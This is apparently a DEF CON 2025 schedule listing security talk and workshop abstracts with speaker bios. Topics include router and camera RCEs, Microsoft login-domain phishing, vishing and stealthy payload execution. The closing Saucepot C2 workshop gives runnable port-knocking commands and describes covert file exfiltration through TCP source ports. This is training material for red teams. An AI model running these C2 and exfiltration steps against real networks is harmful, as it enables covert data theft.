Lexie has worked in cybersecurity for ten years in various positions. During this time, she developed a strong affinity for electrical engineering, programming, and robotics engineering. Despite not having a traditional academic background, she has extensive hands-on experience from her eight years in the US Air Force, specializing in cybersecurity and tactical networks for aircraft missions and operations. Her focus on securing and testing the security of autonomous systems stems from these experiences, and she is passionate about sharing the techniques she has learned. She currently runs a local hackerspace in Philadelphia in support of DC215 called the Ex Machina Parlor where anyone can come to learn new hacking tools, try to build offensive or defensive security robots, and use 3D printers on standby for any prototyping people want.
SpeakerBio: Munir Muhammad
Munir is a cybersecurity intern with the City of Philadelphia and a senior in college. He’s focused on learning how to keep computer systems safe from threats. He is especially interested in defensive security and enjoys finding new ways to protect networks and data. He is active in local tech meetups, works on open-source security projects, and is a member and community engagement coordinator at EMP (Ex Machina Parlor), a Philadelphia hackerspace where people can explore new hacking tools, build security robots, and use 3D printers for prototyping. He also supports students as a teaching assistant for software engineering courses. He is looking forward to meeting new people at DEF CON, learning from the community, and helping newcomers find their way into cybersecurity.
After years of planning and development, the highly anticipated new version of rs0n's bug bounty hunting framework is ready to go! Aptly named The Ars0n Framework v2, this tool is specifically designed to help eliminate the friction for aspiring bug bounty hunters. This tool not only automates the most commonly used bug bounty hunting workflows but each section includes detailed lessons that help beginners understand the "Why?" behind the methodology. Finally (and perhaps most exciting of all), reports generated from the data collected provide the user with guidance at critical decision points based on rs0n's many years of bug bounty hunting experience. Simply put, this tool is designed to help beginners compete w/ the pros on Day 1, and the best part is it's absolutely FREE!
SpeakerBio: Harrison "rs0n" Richardson
Harrison Richardson (rs0n) began his cybersecurity career in the US Army as a 25B. After leaving the service, Harrison worked various contract and freelance jobs while completing his Master's in Cybersecurity from the University of Dallas. Harrison's first full-time job in the civilian sector was at Rapid7, where he worked as a senior security solutions engineer as part of their Applied Engineering Team. Today, Harrison works as a product security engineer covering web applications, cloud, and AI systems. In his free time, Harrison develops a wide range of open-source tools and works to provide educational content to the bug bounty community through YouTube & Twitch.
Join in on the official DEF CON Pool Party for Food, Drinks, and Music!
Watched the vishing competition and caught the bug? Welcome to the world of social engineering! Now let's turn that adrenaline into action. In this talk, I'm handing over the knowledge and worksheet that I use to plan my vishing calls, complete with pretext ideas, vishing tips and the kinds of pushback you might encounter on your calls. We'll dive into the art of social engineering over the phone. You'll learn how to build believable pretexts and what makes a voice sound trustworthy. I'll give you what you need to be ready to pick up the phone. You'll leave with everything you need, except a burner phone. And unlike Miranda Priestly, your targets won't even see you coming.
SpeakerBio: Cronkitten
Cronkitten (they/them) is a cybersecurity professional, threat hunter, vishing competitor and relentless advocate for ethical social engineering. As a returning vishing competition contender, Cronkitten thrives in the booth and on the phone. When they're not building new tools in the SOC, they're crafting pretexts, coaching newcomers, and teaching others how to dial with confidence, charisma and just the right amount of chaos (Ok, it's a lot of chaos, but the good kind). Equal parts charm and strategy, Cronkitten brings a hacker's mindset and a people-first approach to every call. Cronkitten says make that call, embrace the chaos and live in the meow-ment.
DOM Clobbering is a type of code-reuse attack on the web that exploits naming collisions between DOM elements and JavaScript variables for malicious consequences, such as Cross-site Scripting.
In this talk, we present a novel systematization of DOM Clobbering exploitation in four stages, integrating existing techniques while introducing new clobbering primitives. Based on this foundation, we introduce Hulk, the first dynamic analysis tool to automatically detect DOM Clobbering gadgets and generate working exploits end-to-end.
Our evaluation revealed an alarming prevalence of DOM Clobbering vulnerabilities across the web ecosystem. We discovered 497 zero-day DOM Clobbering gadgets in the Tranco Top 5,000 sites, affecting popular client-side libraries, including Google Client API, Webpack, Vite, Rollup, and Astro—all of which have since acknowledged and patched the issue.
To complete our exploitation chain, we further study its trigger: the HTML Injection vulnerability. Our systematic analysis of HTML Injection uncovered over 200 websites vulnerable to HTML injection. By combining them with our discovered gadgets, we demonstrated complete attack chains in popular applications like Jupyter Notebook/JupyterLab, HackMD.io, and Canvas LMS. This research has resulted in 19 CVE identifiers being assigned to date.
Speakers: Zhengyu Liu, Jianjia Yu
Zhengyu Liu is a Ph.D. student in Computer Science at Johns Hopkins University, advised by Prof. Yinzhi Cao. His research focuses on Web Security, with an emphasis on systematic vulnerability study through automated program analysis techniques, including static/dynamic analysis, and LLM-integrated approaches. His first-author work has been published in top-tier venues such as IEEE S&P 2024 and USENIX Security 2025, and has received the Best Student Paper Award at ICICS 2022. His research has led to the discovery of many zero-day vulnerabilities in widely used software such as Azure CLI, Google Client API Library, and Jupyter Notebook/JupyterLab, resulting in over 30 CVEs in popular open-source projects (>1K stars on GitHub) and acknowledgments from Microsoft, Google, Meta, and Ant Group.
SpeakerBio: Jianjia Yu
Jianjia Yu is a PhD student at Johns Hopkins University. Her research focuses on the security and privacy of web and mobile applications, using program analysis. She received a Distinguished Paper Award at CCS 2023 for her work on browser extension vulnerabilities.
In today's hyper-connected world, one vulnerability remains reliably exploitable: the human. Social engineering -- the manipulation of people to gain unauthorized access or extract sensitive information -- continues to outpace technical exploits in both effectiveness and stealth. But in the age of AI, these attacks are evolving faster, becoming more scalable, convincing, and harder to detect.
This talk explores the many faces of modern social engineering: from classic phishing, vishing, and physical intrusion, to AI-generated phishing emails, deepfake voice calls, and synthetic identities crafted by language models. We'll walk through real-world scenarios where attackers exploit trust, urgency, charm, and emotion—now enhanced by tools that can replicate human tone, write believable pretexts, and automate reconnaissance at scale.
You'll leave with a deeper understanding of how AI is supercharging social engineering, what this means for defenders and red teamers alike, and how to recognize the increasingly subtle cues of human-targeted compromise.
SpeakerBio: fir3d0g
David has spent nearly 2 decades in cybersecurity, transitioning from systems and network administration to offensive security. He has successfully breached banks, law firms, government facilities, and more, all over the globe. David speaks at conferences nationwide, sharing knowledge and humorous stories. Prior to his career in cybersecurity, he served in the U.S. Army, including a tour in Iraq.
The Illuminati Party is excited to open our doors once again to all those who wish to join us at DEF CON for an OPEN party welcoming all of our Hacker Family!
Step into The Jasmine Dragon, an exclusive underground gathering where tradition meets the digital age, and the beat flows like perfectly executed code. With DJ Iroh dropping martial arts-inspired hip-hop, expect deep cuts, heavy bass, and an atmosphere that fuses cyberpunk aesthetics with ancient strategy. This isn’t just a party—it’s a cipher, a meeting of minds where warriors and tacticians alike can connect, scheme, and unwind. But entry isn’t for just anyone; only those who hold the right Pai Sho tile will unlock the door to this hidden node.
Draytek routers are widely deployed edge devices trusted by thousands of organizations, and therefore remain a high-value target for attackers. Building on our prior DEFCON32 HHV presentation (https://www.youtube.com/watch?v=BiBMsw0N_mQ) on backdooring these devices, where we also exposed six vulnerabilities and released Draytek Arsenal (https://github.com/infobyte/draytek-arsenal), a toolkit to analyze Draytek firmware, we return with two new unauthenticated RCEs: CVE-2024-51138, a buffer overflow in STUN CGI handling, and CVE-2024-51139, an integer overflow in CGI parsing. When chained with our prior persistence techniques, these bugs enable a full device takeover and backdoor from the internet.
This talk provides an in-depth analysis of the new vulnerabilities and their exploitation strategies with demos and the full end-to-end exploitation chain. We’ll also explore their potential link to the mass Draytek reboot incidents of March 2025, suggesting that real-world exploitation of some of these vulnerabilities may already be underway. Attendees will gain insight into edge device exploitation, persistent compromise, and the importance of transparency and tooling in embedded security research.
Speakers: Octavio Gianatiempo, Gaston Aznarez
The Pwnies are an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community. Every year, members of the infosec community nominate the best research and exploits they’ve seen. The Pwnie Award nominations are judged by a panel of respected security researchers and former pwnie award recipients – the closest to a jury of peers a hacker is likely to ever get. At this event DEF CON attendees will get a first person look at some of the most groundbreaking research and hacks in the cyber security community of the past year, and the winners get some well deserved recognition from the broader community for the great work they’ve done.
We do not have any strict prerequisites. We publish nominees ahead of time to give people a heads up that they may want to attend DEF CON to accept the award if they win.
Kind of! We accept nominees earlier in the year and then publish and announce them at Summercon every year. Summercon will be held in Brooklyn, NY on 7/11/2025. Members of the community and past Pwnie Award Winners then vote on who should win each category. Those winners are then announced during the show at DEF CON.
How Scam compounds in South East Asia are driving a wave of scams globally
I will cover the tools available in the corporate network, the limitations of remote investigations, and the signatures of threat actors. All examples are cases I have actively worked in the past two years. This will range from the individual threat (timecard fraud identified through network logs, which led to the geolocation of an automated fingerprint device hidden in a facility) to large numbers of contractors working in denied areas, to ultimately the identification and mitigation of North Korean IT worker fraud within the network.
1. Speaker intro and brief background
   1. An on-site contractor had to be on site daily between 9 and 5, but there was little work. They connected an older-generation iPhone to the visitor network and hid it in a box in a cubicle away from foot traffic.
      1. The device had the timecard app for $company, which required a manual fingerprint touch/swipe geolocated to the customer site daily.
      2. The contractor automated a device with a synthetic flesh covering over a robotic finger, which would press log in at 0900 and log out at 5 pm, Monday to Friday.
      3. The device was discovered by janitors and assumed to be an explosive device at first.
      4. Picture analysis revealed the make/model of the iPhone.
      5. I gained access to the visitor Wi-Fi logs, found the MAC address of the iPhone/device name (named $contractor name) and the traffic going to the contractor timesheet website.
      Other devices were also found with similar configurations for the user and his manager.
2. How I was introduced to the IoT Village through chip-off extraction of a Chinese voting machine in 2022 by the IoT experts
   - Description of the voting machine prototype from China: 4G connectivity, Bluetooth, Wi-Fi, but no true data ports for analysis
   - Chip-off extraction by IoT Village (videos)
   - End result of the analysis and where the images went for national security
3. North Korean IT fraudulent worker hunting
   1. Micro level: PiKVM switch hunting at the individual network detection level, now turned into an email alert via date UEBA
   2. Hints and clues via digital forensics: devices added to the workstation that are not related to the users
      1. Kim’s iPhones connecting to George’s virtual machine
      2. Multiple user devices (verified through MAC address) connecting to the same workstation
      3. Timecards being updated in HR systems in the Beijing/NK time zone on emulators
         1. Can see it’s a Linux device/Android phone, whereas most legitimate users are on either Android or iPhone. Connecting to a Wi-Fi VPN router for all connections and forgetting 2FA is tied to the local infrastructure
      4. A user was being terminated from company A as a fraudulent worker while company B/C screens were in the background. With the screenshot time provided by our partner, I executed a Windows event code search in Splunk for devices locked within the window of the termination from company A. We ultimately found a full-stack dev fitting the description of NKIT suspects with an Astrill VPN. While hunting for this user, we identified one working out of China and spoofing their location. The HUMINT interview, while far from the IoT arena, revealed the user’s deception, as they would not open the windows locally to prove they are in the same geographic time zone.
SpeakerBio: Will Baggett
Will Baggett (@iOSforensic) is a Lead Investigator for Digital Forensics and Insider Threat at a Fiscal Infrastructure organization. He is also Director of Digital Forensics at Operation Safe Escape (volunteer role), a non-profit organization providing assistance to victims of domestic abuse.
Operational Technology (OT) describes devices and protocols used to control real-world operations: factories, assembly lines, medical equipment, and so on.
For decades, this technology was isolated (more or less) from the wider world, using custom protocols and communications media. However, over the past 15 - 20 years, these devices have started using commodity protocols and media more and more. This means that these devices are now using the standard TCP/IP protocol suite, a concept referred to as "OT/IT convergence."
This convergence has obvious benefits, making these devices cheaper and more manageable. However, it also makes them more accessible to attackers, and their security posture has often not kept up.
As part of this convergence process, many devices are connected via protocol gateways. These gateways speak TCP/IP, and then translate communications to proprietary OT protocols (or simply provide a NAT-style private network within an OT device rack).
This talk discusses techniques for detecting devices on the "other side" of these gateways. It begins with a brief introduction to the history of OT, moving on to the OT/IT convergence phenomenon. It then discusses the issue of protocol translation and provides two practical examples of discovering assets across gateways: CIP (Common Industrial Protocol) message forwarding and DNP3 (Distributed Network Protocol, version 3) address discovery.
These techniques are provided as examples to illustrate the issue of OT device discovery, and to encourage the audience to perform further research in how these sorts of devices may be discovered on networks and, ultimately, protected.
SpeakerBio: Rob King, runZero
Rob King is the Director of Security Research at runZero. Over his career Rob has served as a senior researcher with KoreLogic, the architect for TippingPoint DVLabs, and helped get several startups off the ground. Rob helped design SC Magazine's Data Leakage Prevention Product of the Year for 2010, and was awarded the 3Com Innovator of the Year Award in 2009. He has been invited to speak at BlackHat, DEF CON, Shmoocon, SANS Network Security, and USENIX.
TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.
Speakers: Arjun "T3R4_KAAL" Chaudhary, Anmol "Fr13nd0x7f" K. Sachan
Arjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Anmol "Fr13nd0x7f" K. Sachan
Anmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.
The accelerating evolution of technology, specifically AI, has created a "meta-system" so complex and intertwined with all domains of knowledge and human life that it effectively operates on a meta-level, shaping our reality and exceeding our control. The meta-system requires collaboration among all of its parts for effective management. We need to think on a meta-level because the meta-system is thinking about us in its own unique terms. We must adopt a "hacker" mindset – thinking critically, creatively, collaboratively, and systematically – to navigate this new reality.
SpeakerBio: Richard "neuralcowboy" Thieme
Richard Thieme has published numerous articles and short stories and thirteen books, and has delivered hundreds of speeches. His recent Mobius Trilogy illuminates the impacts of security and intelligence work on practitioners. The trilogy was lauded by a 20-year CIA veteran as one of the five best works of serious spy fiction ever. He spoke at DEF CON in 2022, his 26th year as an uber-contributor, and keynoted the first two Black Hats. He has keynoted security conferences in 15 countries, and his clients range from GE, Microsoft, Medtronic, Bank of America, Allstate Insurance, and Johnson Controls to the NSA, FBI, US Dept of the Treasury, Los Alamos National Lab, the Pentagon Security Forum, and the US Secret Service.
Backblaze Drive Stats is an open dataset that has tracked hard drive and SSD reliability across our data centers since 2013. This session covers recent backend upgrades—including a modular versioning system and migration to Snowflake with Trino and Iceberg—that improved data processing and failure validation. We'll also share updated AFR trends by drive model and size, SSD tracking challenges, and how drive insights have underpinned performance improvements in data centers.
Speakers: Pat Patterson, Stephanie Doyle
Pat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.
SpeakerBio: Stephanie Doyle, Associate Editor & Writer at Backblaze
Stephanie is the Associate Editor & Writer at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.
When the first measurement studies of the GFW came out in the early 2000s, computation and power consumption were 30,000X greater than they are today. Because of this, China’s GFW resided deeper in the network and further away from homes and data centers. The substantial increase in computational efficiency has made processing and filtering in-path and near connection end-points viable while the volume of network traffic in today’s Internet has made this design a virtual necessity. Russia’s censorship apparatus, the TSPU, has emerged as a state-of-the-art system, on par with the GFW, and a potentially more significant threat, particularly for users of Russian apps and data centers. There are two reasons for this. First, Russia’s design, which places censors in-path and closer to end-hosts (residential modems and data center connections), permits more granular, targeted attacks. Second, according to the Russian government, sanctions have compelled them to build their own certificate authority and require all Russian software to trust this certificate authority. Combining these two factors implies major threats to users interacting with Russian data centers and software. Fortunately, research has identified cases where the TSPU can be circumvented. New tools based on these ideas could be the future of circumvention.
References:
Censorship of VPNs today, link
SpeakerBio: Benjamin "bmixonbaca" Mixon-Baca
I am a security researcher focused on Internet Freedom, censorship circumvention, and pwning middleboxes, firewalls, and other devices that are supposed to keep me "safe". I have developed attacks against VPN software. The one relevant to this presentation is CVE-2021-3773. This vulnerability affects VPNs but is actually because of issues in the firewall/connection tracking framework (e.g., Netfilter) of the underlying OS running the VPN. An attacker can use this vulnerability to redirect packets in various ways and can even let an attacker escalate from adjacent to in-path between the victim and VPN server. I applied insights I gained while developing this attack to testing the TSPU and was able to develop bypass strategies. This is because the underlying design of connection tracking frameworks, such as how they track TCP states and direction, is basically the same for both network layer VPNs like OpenVPN and WireGuard and firewalls like the TSPU.
What are the consequences if an adversary compromises the surveillance cameras of thousands of leading Western organizations and companies? As trust in Chinese-made IoT devices declines, organizations face limited alternatives—especially in video surveillance. Many governments have already banned Dahua and Hikvision products in sensitive facilities, further narrowing their choices. This concern drove our research, revealing that surveillance platforms can be double-edged swords.
We focused on Axis Communications, a major player in video surveillance widely used by U.S. government agencies, schools, medical facilities, and Fortune 500 companies.
In our talk, we will present an in-depth analysis of the Axis.Remoting communication protocol, uncovering critical vulnerabilities that allow attackers to achieve pre-auth RCE on Axis platforms. This access could serve as a gateway into an organization’s internal network via its surveillance infrastructure. Additionally, we identified a novel technique for passive data exfiltration, enabling attackers to map organizations using this equipment—potentially aiding in targeted attacks.
SpeakerBio: Noam Moshe
Noam Moshe is a vulnerability researcher and Team Lead at Claroty Team82. Noam specializes in vulnerability research, web applications pentesting, malware analysis, network forensics and ICS/SCADA security. In addition, Noam has presented at well-known hacking conferences like Black Hat and DEF CON, and won Master of Pwn at Pwn2Own Miami 2023.
Microsoft Entra ID – one of the most used identity providers in the enterprise market. Or from our perspective: the most targeted platform in phishing attacks. Getting our phishing infrastructure up and running is usually the easy part. The real challenge is often keeping it online long enough to deliver the phishing link and collect credentials without detection before it gets burned.
But what if we could use Microsoft's official login domain for our phishing purposes? And no, I'm not talking about the heavily mitigated OAuth Consent or Device Code Phishing techniques, or simply hosting a phishing page on Azure Web App subdomains. I'm talking about stealing credentials directly from the legitimate login.microsoftonline.com domain.
In this talk, I will share multiple novel methods that can be used to achieve this. And the best of all? It all relies on legitimate functionality, making it mostly unpatchable. 😈
SpeakerBio: Keanu "RedByte" Nys, Spotit
Keanu Nys (aka RedByte) is an information security researcher from Belgium, and currently leads spotit's offensive security team. While he has a passion for all offensive cybersecurity topics, he mostly specializes in Active Directory, Microsoft Entra ID (Azure AD), and Social Engineering.
He is the author of the Microsoft 365 and Entra attack toolkit GraphSpy. Additionally, Keanu is the trainer for the Certified Azure Red Team Expert (CARTE) bootcamps and an instructor for various Azure Red Teaming courses at Altered Security, a company focusing on hands-on enterprise security learning (https://www.alteredsecurity.com/), and has presented at hacker conferences such as BruCON.
In this talk we want to dive deep into the world of direct TPMS. These systems are used by a great portion of the cars on the road today, and typically send information about a car’s tires wirelessly without any encryption or authentication. We show that it is feasible to capture these signals with very low cost hardware to build a tracking infrastructure. We also present a tool that allows us to create custom TPMS messages and spoof the ECU of different cars.
SpeakerBio: Yago Lizarribar
The Unmanned Wireless Penetration Testing Device is a modular, open-source system enabling remote wireless security assessments. Using long-range LoRa communication, a mobile rover can perform Wi-Fi reconnaissance, deauthentication attacks, Bluetooth device discovery, and image capture without requiring proximity to the target network. Controlled entirely via encrypted LoRa packets, the system is optimized for secure operations in remote or inaccessible environments. Attendees will see live demonstrations of wireless attacks issued over LoRa and learn how the system can be adapted for mobile and drone-based security operations. Source code and build instructions will be freely available under an open license.
Speakers: Ayaan Qayyum, Omar Hamoudeh
Ayaan is a Master of Science student in electrical engineering at Columbia University. His research interests include mobile computing, applied machine learning, edge AI, digital signal processing, mathematical modeling, and information systems. He completed his undergraduate studies at Rutgers University–New Brunswick, earning a Bachelor of Science in electrical and computer engineering with a minor in mathematics. His technical background spans embedded systems, wireless communication, and hardware security, with certifications in AWS AI and cloud technologies. He has published research across cybersecurity, FPGA systems, and machine learning, including a project on FPGA fast Fourier transform implementation and a machine learning-based stock forecasting model. His work has been recognized at academic conferences such as the IEEE Integrated STEM Education Conference and the Rutgers JJ Slade Research Symposium. He is currently a technical research intern at the Intelligent and Connected Systems Laboratory at Columbia University. He was a program mentor for the Governor's School of New Jersey designing search-and-rescue drone systems utilizing real-time edge inference. He is passionate about building scalable, open-source security tools and bridging the gap between theory and real-world deployment.
SpeakerBio: Omar Hamoudeh
Omar is a wireless security enthusiast and builder who recently completed his B.S. in electrical and computer engineering at Rutgers University. His work focuses on embedded systems security, hardware hacking, and wireless exploitation. As part of a senior design project, he developed an unmanned wireless penetration testing rover using LoRa for remote Wi-Fi scanning and reconnaissance. The project earned second place at the 2025 Rutgers ECE Capstone Expo. He also worked extensively on secure architecture projects, including implementing TrustZone on an ARM-based microcontroller to separate secure and non-secure execution environments. In a separate project, he designed a lightweight firmware validation system to detect unauthorized modifications in IoT devices. His current research centers on building low-profile tools for wireless network exploitation and resilience testing.
Neumann Lim has a strong background in cybersecurity and infrastructure management and currently leads the Odlum Brown team. He also has extensive IR experience from previous companies such as Deloitte Canada, EY, CGI, and ISA. Currently, Neumann serves in advisory board roles at SANS, EC-Council and other organizations. Neumann’s expertise includes digital forensics, incident response, modernizing infrastructure, infrastructure resilience, site reliability, malware research, pentesting and leadership in information security policies. Outside of corporate life, Neumann is the co-founder of Malware Village and a judge and participant in various cyber CTFs. Neumann is often seen speaking or leading workshops at various conferences such as DEFCON, BlueTeamVillage, GrayhatCon, BSides, Toronto CISO Summit, CCTX, HTCIA, and IACIS.
SpeakerBio: Jugal Patel
DEF CON is renowned for bringing together some of the brightest minds in technology and security. By participating in VETCON, you have the chance to highlight the critical role veterans play in this landscape and explore how technology can support and enhance their lives.
Voice cloning technology has advanced significantly, enabling the creation of convincing voice replicas using consumer-grade devices and publicly available tools. This poses critical challenges to aviation communication, where trust between pilots and air traffic controllers is paramount. The reliance on AM radio, with its low fidelity and lack of authentication, exacerbates the risk of fraudulent communications. This talk examines trust factors within aviation's air traffic control system, focusing on how air traffic controllers' voices can be cloned and where planes are most at risk. The talk explores FCC enforcement techniques for locating malicious actors, historical perspectives on alternative radio technologies, and the secondary systems pilots employ during communication failures. Simulated attacks will demonstrate how these vulnerabilities could disrupt operations, particularly at critical points such as runway crossings and in low-visibility conditions.
To mitigate these risks, this talk evaluates existing safeguards, including the Traffic Collision Avoidance System (TCAS), and discusses emerging technologies such as stop bars and guided runway lighting.
Andrew Logan is an audio engineer, independent aviation journalist and developer @HelicoptersofDC who presented Tracking Military Ghost Helicopters over Washington DC at Def Con 30. Since then his advocacy urging lawmakers to review ADS-B exemptions for government aircraft has been cited by the Senate in the wake of the Flight 5342 crash.
Warhead is an offensive security tool that leverages Windows Atom Tables to store, retrieve, and execute payloads in a stealthy manner. This technique enables adversaries to place a payload in the Atom Table, use a legitimate process to extract it, and execute it in memory—bypassing traditional detection mechanisms. The first version of Warhead, to be released at Black Hat Arsenal 2025, provides security researchers and red teamers with a novel approach to payload delivery and execution that evades modern security defenses.
Speakers: Vishal "Vish" Thakur, David "Votd_ctf" Wearing
Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.
He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for the APAC region at Atlassian.
SpeakerBio: David "Votd_ctf" Wearing
Game cheats and malware share the same stealthy DNA - this talk breaks down how. We’ll explore cheat loaders and draw parallels between anti-cheat countermeasures and enterprise EDR techniques.
SpeakerBio: Joe "Juno" Aurelio, Security Researcher
Joe Aurelio is a distinguished security researcher with over a decade of hands-on experience in vulnerability research, reverse engineering, and mobile security. He currently leads teams of researchers in the private sector securing large-scale technology platforms. His expertise spans both the private and defense sectors, with a track record of uncovering critical security vulnerabilities in mobile applications and complex infrastructure affecting millions of users. In addition to his work in traditional security domains, he channels his passion for cybersecurity education with a unique interest in exploring game hacking techniques. He is a lead of the Game Hacking Village, where he teaches security by turning game hacks into ethical and engaging educational tools. Joe has a broad background in security, underscored by the highly respected OSCP certification and a Master’s degree in computer science.
As software supply chains embrace transparency through SBOMs, hardware remains a black box. Yet the chips inside our IoT devices carry just as much — if not more — risk. From cloned components to opaque fabs, the semiconductor supply chain is fast becoming a national security flashpoint. Governments are scrambling to respond with blunt tools like bans and onshoring, but these approaches are slow, costly, and often impractical. Traditional BOMs focus on procurement and production — what gets bought and assembled — but they rarely capture origin, integrity, or risk context. They weren’t built to expose inter-organizational dependencies or detect supply chain manipulation. Enter the HBOM Initiative — a new effort to bring visibility, traceability, and accountability to the hardware supply chain. By developing tools and practices for a hardware bill of materials (HBOM), we aim to expose hidden risks, trace chip provenance, and empower sectors to make smarter, risk-informed decisions without sacrificing adaptability or innovation. This talk will explore why HBOMs are inevitable, what makes them hard, and how the hacker and security community can help shape the future of hardware trust.
SpeakerBio: Allan Friedman, Adjunct Professor of Informatics at the Luddy School of Informatics, Computing, and Engineering at Indiana University
Cryptocurrency is everywhere now. Billion-dollar companies are built on it, entire economies run on Bitcoin, and cybercriminals love using it to finance their operations or hide stolen money. Cryptocurrencies promise anonymity, yet blockchain transactions are fully public, which makes it tricky to hide funds.
In February 2025, the Bybit breach exposed two advanced attack vectors. First, a third-party wallet tool was compromised through malicious JavaScript injected into its logic, allowing attackers to manipulate smart contract behavior. Second, a SAFE Wallet developer was tricked through social engineering into running a fake Docker container, giving attackers persistent access to his machine.
With control established, they hijacked proxy contracts and executed stealth withdrawals of ETH and ERC-20 tokens. The stolen assets were laundered through decentralized exchanges, split across multiple wallets, bridged to Bitcoin, and passed through mixers like Wasabi Wallet.
So how do attackers manage to launder crypto, and how can we stop them? Using the 1.46 billion dollar Bybit hack by North Korea’s Lazarus Group as a case study, this talk breaks down each laundering step and explains how to automate tracking and accelerate investigations using AI.
SpeakerBio: Thomas "fr0gger_" Roccia
Thomas Roccia is a Senior Security Researcher at Microsoft with over 15 years of experience in the cybersecurity industry. His work focuses on threat intelligence and malware analysis.
Throughout his career, he has investigated major cyberattacks, managed critical outbreaks, and collaborated with law enforcement while tracking cybercrime and nation-state campaigns. He has traveled globally to respond to threats and share his expertise.
Thomas is a regular speaker at leading security conferences and an active contributor to the open-source community. Since 2015, he has maintained the Unprotect Project, an open database of malware evasion techniques. In 2023, he published Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, which became a bestseller and won the Bronze Foreword INDIES Award in the Science & Technology category.
Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or "knocks") to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.
In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:
Technique ID | Technique Name | Tactic |
---|---|---|
T1041 | Exfiltration Over C2 Channel | Exfiltration |
T1071.001 | Application Layer Protocol: Web | Command and Control |
T1205.001 | Traffic Signaling: Port Knocking | Command and Control / Defense Evasion |
Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Saucepot C2 include:
- Check-in / heartbeat
- Directory listing
- Process listing
- File upload
Server:
```
sudo apt install net-tools knockd nginx python3-pip python3-scapy
git clone https://github.com/netskopeoss/saucepot
echo "v2025.8" | sudo tee /var/www/html/chk-version
```
Client:
```
sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl
git clone https://github.com/netskopeoss/saucepot
```
Server: hide the web server until the correct knock sequence (4100, 4200, 4500) has been provided.
```
sudo iptables -I INPUT -p tcp --dport 80 -j REJECT
sudo systemctl start nginx
```
Add the following section to /etc/knockd.conf:
```
[OpenCloseSecretWeb]
    sequence      = 4100,4200,4500
    seq_timeout   = 30
    tcpflags      = syn
    start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    cmd_timeout   = 7200
    stop_command  = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
```
If the default interface is not `eth0`, add `Interface = InterfaceName` to the `[options]` section.
Restart knockd:
```
sudo systemctl restart knockd
```
Client: the protected web service should be unreachable by default.
```
curl http://server_public_ip
```
Provide the correct knock sequence; the protected web service should now be reachable.
```
for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done
curl http://server_public_ip
```
Exercise 2: Ephemeral port checker
Check whether you're in a friendly environment where the client's source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop's network environment fails the test, an additional VPC instance will be needed to act as the client.
Server:
```
sudo systemctl stop nginx
sudo python3 saucepot-server.py -c -p 80
```
Client:
```
python3 saucepot-client.py -c -d server_public_ip -p 80
Test 1 with ephemeral port 63034: PASS
Test 2 with ephemeral port 51151: PASS
Test 3 with ephemeral port 54321: PASS

Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique!
```
Exercise 3: Data exfiltration
Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.
